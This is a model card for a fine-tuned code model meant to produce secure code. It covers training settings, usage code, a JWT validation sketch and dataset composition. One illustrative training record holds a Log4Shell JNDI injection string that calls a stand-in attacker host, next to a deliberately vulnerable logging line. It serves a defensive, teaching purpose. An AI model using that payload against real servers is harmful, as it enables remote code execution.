StarCoder2 15B SecureCode


The open-source flagship of the SecureCode collection: a security-aware code generation model fine-tuned on 2,185 real-world vulnerability examples covering the OWASP Top 10 (2021) and the OWASP LLM Top 10 (2025).

Dataset | Paper | Model Collection | perfecXion.ai | Blog Post


What This Model Does

StarCoder2 15B SecureCode generates security-aware code: it was fine-tuned to recognize vulnerability patterns and produce secure implementations. Every training example includes:

  • Real-world incident grounding — Tied to documented CVEs and breach reports
  • Vulnerable + secure implementations — Side-by-side comparison
  • Attack demonstrations — Concrete exploit code
  • Defense-in-depth guidance — SIEM rules, logging, monitoring, infrastructure hardening
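
Concretely, a single training record pairs these four elements. The sketch below is illustrative only; the field names are hypothetical, not the dataset's actual schema (see the dataset card for that):

```python
# Illustrative shape of one SecureCode training record.
# NOTE: field names here are hypothetical, not the dataset's real schema.
example = {
    "incident": "CVE-2021-44228 (Log4Shell): JNDI lookup injection via log messages",
    "vulnerable_code": 'logger.info("User input: " + user_input)  # attacker-controlled',
    "secure_code": 'logger.info("User input: %s", sanitize(user_input))',
    "attack_demo": "${jndi:ldap://attacker.example/a}",
    "defense_in_depth": [
        "SIEM rule: alert on outbound LDAP connections from app servers",
        "Disable JNDI message lookups (log4j2.formatMsgNoLookups=true)",
    ],
}
```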

Model Details

| Property | Value |
|---|---|
| Base Model | bigcode/starcoder2-15b-instruct-v0.1 |
| Parameters | 15B |
| Architecture | StarCoder2 (decoder-only transformer) |
| Method | QLoRA (4-bit quantization + LoRA) |
| LoRA Rank | 16 |
| LoRA Alpha | 32 |
| Training Data | scthornton/securecode (2,185 examples) |
| Training Time | ~1h 40min |
| Hardware | 2x NVIDIA A100 40GB (GCP) |
| Framework | PEFT 0.18.1, Transformers 5.1.0, PyTorch 2.7.1 |
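
The QLoRA setup in the table can be sketched with `BitsAndBytesConfig` and `LoraConfig`. Rank and alpha come from the table above; `target_modules`, dropout, and the NF4/double-quantization settings are illustrative assumptions, not documented values:

```python
import torch
from transformers import BitsAndBytesConfig
from peft import LoraConfig

# 4-bit quantization for the frozen base model (QLoRA)
# NF4 + double quantization are assumptions, not the card's stated config
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_quant_type="nf4",
    bnb_4bit_compute_dtype=torch.bfloat16,
    bnb_4bit_use_double_quant=True,
)

# LoRA adapter: r=16 and alpha=32 from the table above;
# target_modules and dropout are illustrative assumptions
lora_config = LoraConfig(
    r=16,
    lora_alpha=32,
    lora_dropout=0.05,
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj"],
    bias="none",
    task_type="CAUSAL_LM",
)
```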

Quick Start

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig
from peft import PeftModel

# Load the base model in 4-bit, then attach the LoRA adapter
bnb_config = BitsAndBytesConfig(
    load_in_4bit=True,
    bnb_4bit_compute_dtype=torch.bfloat16,
)
base_model = AutoModelForCausalLM.from_pretrained(
    "bigcode/starcoder2-15b-instruct-v0.1",
    device_map="auto",
    quantization_config=bnb_config,
)
model = PeftModel.from_pretrained(base_model, "scthornton/starcoder2-15b-securecode")
tokenizer = AutoTokenizer.from_pretrained("scthornton/starcoder2-15b-securecode")

# Generate secure code
prompt = "Write a secure JWT authentication handler in Python with proper token validation"
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=512, do_sample=True, temperature=0.7)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
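
For the example prompt above, the kind of secure pattern the training data emphasizes can be illustrated with a stdlib-only HS256 JWT check. This is a hedged sketch of the pattern, not model output: reject unexpected algorithms, compare signatures in constant time, and enforce expiry:

```python
import base64
import hashlib
import hmac
import json
import time

def _b64url_decode(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))

def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def sign_jwt_hs256(payload: dict, secret: bytes) -> str:
    header_b64 = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload_b64 = _b64url_encode(json.dumps(payload).encode())
    sig = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    return f"{header_b64}.{payload_b64}.{_b64url_encode(sig)}"

def verify_jwt_hs256(token: str, secret: bytes) -> dict:
    header_b64, payload_b64, sig_b64 = token.split(".")
    header = json.loads(_b64url_decode(header_b64))
    if header.get("alg") != "HS256":          # reject "none" / alg-confusion attacks
        raise ValueError("unexpected algorithm")
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):  # constant-time compare
        raise ValueError("invalid signature")
    payload = json.loads(_b64url_decode(payload_b64))
    if payload.get("exp", 0) < time.time():   # enforce token expiry
        raise ValueError("token expired")
    return payload
```

In production you would normally reach for a maintained library (e.g. PyJWT) rather than hand-rolling this; the sketch only shows which checks "proper token validation" must include.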

Training Details

| Hyperparameter | Value |
|---|---|
| Learning Rate | 2e-4 |
| Batch Size | 1 |
| Gradient Accumulation | 16 |
| Epochs | 3 |
| Scheduler | Cosine |
| Warmup Steps | 100 |
| Optimizer | paged_adamw_8bit |
| Max Sequence Length | 2048 |
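
These hyperparameters map onto a `transformers` `TrainingArguments` sketch. `output_dir` and `bf16` are assumptions (not stated on the card), and the max sequence length is applied at tokenization time rather than here:

```python
from transformers import TrainingArguments

# Sketch of the fine-tuning configuration from the table above
training_args = TrainingArguments(
    output_dir="starcoder2-15b-securecode",  # assumption
    learning_rate=2e-4,
    per_device_train_batch_size=1,
    gradient_accumulation_steps=16,          # effective batch size of 16
    num_train_epochs=3,
    lr_scheduler_type="cosine",
    warmup_steps=100,
    optim="paged_adamw_8bit",
    bf16=True,                               # assumption (A100s support bf16)
)
```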

Dataset Breakdown

| Component | Examples | Coverage |
|---|---|---|
| Web Security (OWASP Top 10:2021) | 1,378 | 12 languages, 9 frameworks |
| AI/ML Security (OWASP LLM Top 10:2025) | 750 | Prompt injection, RAG poisoning, model theft |
| Framework-Specific Additions | 219 | Django, Flask, Express, Spring Boot, etc. |
| **Total** | **2,185** | Complete OWASP coverage |

SecureCode Model Collection

| Model | Parameters | Base | Training Time | Link |
|---|---|---|---|---|
| Llama 3.2 3B | 3B | Meta Llama 3.2 | 1h 5min | scthornton/llama-3.2-3b-securecode |
| Qwen Coder 7B | 7B | Qwen 2.5 Coder | 1h 24min | scthornton/qwen-coder-7b-securecode |
| CodeGemma 7B | 7B | Google CodeGemma | 1h 27min | scthornton/codegemma-7b-securecode |
| DeepSeek Coder 6.7B | 6.7B | DeepSeek Coder | 1h 15min | scthornton/deepseek-coder-6.7b-securecode |
| CodeLlama 13B | 13B | Meta CodeLlama | 1h 32min | scthornton/codellama-13b-securecode |
| Qwen Coder 14B | 14B | Qwen 2.5 Coder | 1h 19min | scthornton/qwen2.5-coder-14b-securecode |
| StarCoder2 15B | 15B | BigCode StarCoder2 | 1h 40min | This model |
| Granite 20B | 20B | IBM Granite Code | 1h 19min | scthornton/granite-20b-code-securecode |

Citation

```bibtex
@misc{thornton2025securecode,
  title={SecureCode v2.0: A Production-Grade Dataset for Training Security-Aware Code Generation Models},
  author={Thornton, Scott},
  year={2025},
  publisher={perfecXion.ai},
  url={https://perfecxion.ai/articles/securecode-v2-dataset-paper.html},
  note={Model: https://huggingface.co/scthornton/starcoder2-15b-securecode}
}
```

License

BigCode OpenRAIL-M
